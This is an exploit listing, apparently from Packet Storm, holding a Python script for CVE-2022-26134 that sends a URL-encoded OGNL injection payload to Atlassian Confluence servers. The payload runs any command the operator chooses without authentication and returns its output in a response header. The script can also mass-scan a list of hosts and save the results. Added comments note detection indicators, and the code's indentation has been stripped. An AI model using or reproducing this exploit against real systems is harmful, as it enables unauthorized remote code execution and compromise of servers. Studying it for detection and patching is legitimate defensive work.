
Confluence OGNL Injection Remote Code Execution

🗓️ 07 Jun 2022 00:00:00 | Reported by h3v0x, github.com | Type: packetstorm | 🔗 packetstormsecurity.com | 👁 383 Views

Confluence OGNL Injection Remote Code Execution, CVE-2022-26134, Pre-Auth

Code
`#!/usr/bin/python3  
  
# Exploit Title: Confluence Pre-Auth Remote Code Execution via OGNL Injection  
# Google Dork: N/A  
# Date: 06/006/2022  
# Exploit Author: h3v0x  
# Vendor Homepage: https://www.atlassian.com/  
# Software Link: https://www.atlassian.com/software/confluence/download-archives  
# Version: All < 7.4.17 versions before 7.18.1  
# Tested on: -  
# CVE : CVE-2022-26134  
# https://github.com/h3v0x/CVE-2022-26134  
  
import sys  
import requests  
import optparse  
import multiprocessing  
  
from requests.packages import urllib3  
from requests.exceptions import MissingSchema, InvalidURL  
# Suppress urllib3 warnings. The GET in spiderXpl is sent with verify=False,
# which would otherwise emit an insecure-request warning for HTTPS targets.
urllib3.disable_warnings()  
  
# Manager-backed objects are proxies that can be shared with the worker
# processes of the multiprocessing.Pool created in main().
requestEngine = multiprocessing.Manager()  
# NOTE(review): this Session is not referenced again in the visible script;
# the request in spiderXpl is made with requests.get() directly.
session = requests.Session()  
  
# `global` at module level has no effect; the name is already module-scoped.
global paramResults  
# Shared list that collects the result strings appended by spiderXpl.
paramResults = requestEngine.list()  
# At module level locals() is the same mapping as globals(), so this is a no-op.
globals().update(locals())  
  
# spiderXpl(url): probe a single target for CVE-2022-26134.
# Sends one GET whose path is a URL-encoded OGNL expression and, when the
# server answers 302, reads the X-Cmd-Response header, prints it and appends a
# result string to the shared paramResults list. Returns nothing.
#
# NOTE(review): leading indentation was stripped from this listing when the
# page was extracted, so the nesting of the statements below is not shown and
# the text is not valid Python as printed.
#
# Defender notes, taken from the request and response visible in this block:
#   - the request path begins with "%24%7B" (URL-encoded "${") and names
#     java.lang.Runtime and ServletActionContext in the URI itself, so an
#     attempt is visible in web-server access logs and to a reverse proxy/WAF;
#   - a successful attempt is answered with a 302 carrying the non-standard
#     response header "X-Cmd-Response", which can be matched on egress;
#   - the headers below carry no cookie or credential, consistent with the
#     "Pre-Auth" label in the page title;
#   - the script header gives the affected range as versions before
#     7.4.17 / 7.18.1; check the vendor advisory for CVE-2022-26134 for the
#     exact fixed releases before relying on that range.
def spiderXpl(url):  
# Copies the local name `url` into the module globals.
globals().update(locals())  
# A target given without a scheme is treated as plain http.
if not url.startswith('http'):  
url='http://'+url  
  
# Fixed request headers; the User-Agent is a static Chrome 70 string.
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36",  
"Connection": "close",  
"Accept-Encoding": "gzip, deflate"}  
  
try:  
# optionsOpt is the module-level options object set under the __main__ guard.
# verify=False turns off TLS certificate checking; allow_redirects=False keeps
# the 302 response itself so that its headers can be read below.
response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)  
# Only a 302 is treated as a hit; any other status is ignored.
if(response.status_code == 302):  
print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])  
  
inputBuffer = str(response.headers['X-Cmd-Response'])  
# Recorded for the output file written by main().
paramResults.append('Vulnerable application found:'+url+'\n''Command result:'+inputBuffer+'\n')  
else:  
pass  
  
except requests.exceptions.ConnectionError:  
print('[x] Failed to Connect: '+url)  
pass  
# NOTE(review): multiprocessing.log_to_stderr is a function, not an exception
# class, so this clause does not name a valid exception type.
except multiprocessing.log_to_stderr:  
pass  
except KeyboardInterrupt:  
print('[!] Stoping exploit...')  
exit(0)  
# Malformed target strings are skipped silently.
except (MissingSchema, InvalidURL):  
pass  
  
  
# banner(): print the two-line identification header (CVE id and title).
# NOTE(review): indentation was stripped from this listing during extraction.
def banner():  
print('[-] CVE-2022-26134')  
print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \n')  
  
  
# main(): print the banner, then probe either the single --url target or every
# line of the --file list through a multiprocessing.Pool, and write the
# collected results to the --output file.
#
# NOTE(review): leading indentation was stripped from this listing when the
# page was extracted. In particular it cannot be told from the text whether
# the output-writing section sits inside the `else` branch or at function
# level.
#
# Forensics note: the results, including the returned command output, are
# written in plain text to the --output path, whose default in the option
# parser is 'exploit_result.txt'; that file is an artifact on a host where
# the script has been run.
def main():  
banner()  
  
# No local names exist yet at this point, so nothing is copied.
globals().update(locals())  
  
# Raises the interpreter recursion limit; no recursion is visible in this script.
sys.setrecursionlimit(100000)  
  
# Single-target mode when no host file was given.
if not optionsOpt.filehosts:  
url = optionsOpt.url  
spiderXpl(url)  
else:  
# Host-list mode: one target per line, surrounding whitespace stripped.
f = open(optionsOpt.filehosts)  
urls = map(str.strip, f.readlines())  
  
# Despite the option name "threads", these are worker processes.
multiReq = multiprocessing.Pool(optionsOpt.threads_set)  
try:  
multiReq.map(spiderXpl, urls)  
multiReq.close()  
multiReq.join()  
except UnboundLocalError:  
pass  
except KeyboardInterrupt:  
exit(0)  
  
  
if optionsOpt.output:  
print("\n[!] Saving the output result in: %s" % optionsOpt.output)  
  
# One entry of the shared paramResults list per line group.
with open(optionsOpt.output, "w") as f:  
for result in paramResults:  
f.write("%s\n" % result)  
# Redundant: the `with` statement already closes the file.
f.close()  
  
# Script entry point: parse the command-line options into the module-level
# name optionsOpt, which main() and spiderXpl() read as a global, then run main().
# NOTE(review): indentation was stripped from this listing during extraction.
if __name__ == "__main__":  
parser = optparse.OptionParser()  
  
# -u: single target base URL; -f: file with one target per line.
parser.add_option('-u', '--url', action="store", dest="url", help='Base target uri (ex. http://target-uri/)')  
parser.add_option('-f', '--file', dest="filehosts", help='example.txt')  
# -t: size of the multiprocessing.Pool used in host-list mode (default 10).
parser.add_option('-t', '--threads', dest="threads_set", type=int,default=10)  
# NOTE(review): stored as `timeout`, which is not referenced anywhere else in
# the visible script.
parser.add_option('-m', '--maxtimeout', dest="timeout", type=int,default=8)  
# -o: path of the plain-text results file (default 'exploit_result.txt').
parser.add_option('-o', '--output', dest="output", type=str, default='exploit_result.txt')  
# -c: command string inserted into the request path by spiderXpl (default 'id').
parser.add_option('-c', '--cmd', dest="command", type=str, default='id')  
optionsOpt, args = parser.parse_args()  
  
main()  
  
  
  
`
